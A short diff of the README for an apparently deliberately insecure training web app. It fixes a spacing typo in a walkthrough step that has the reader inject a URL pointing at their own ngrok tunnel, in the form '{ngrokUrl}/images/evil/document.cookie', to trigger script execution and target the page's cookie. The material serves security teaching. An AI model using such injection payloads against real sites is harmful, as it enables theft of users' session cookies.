pedropanosyan/insecure-app/README.md

 Well, turns out that here we can inject malicious URL.
 The URL is not malicious itself, but the content is.

-Now lets inject a malicious content, go to the terminal you run ngrok server, copy the forwarding URL (Example: https://e602-190-57-211-204.ngrok-free.app)and put this value inside the input
+Now lets inject a malicious content, go to the terminal you run ngrok server, copy the forwarding URL (Example: https://e602-190-57-211-204.ngrok-free.app) and put this value inside the input
 **{ngrokUrl}/images/evil/document.cookie**

 We'll see the alert prompting again, but what happened?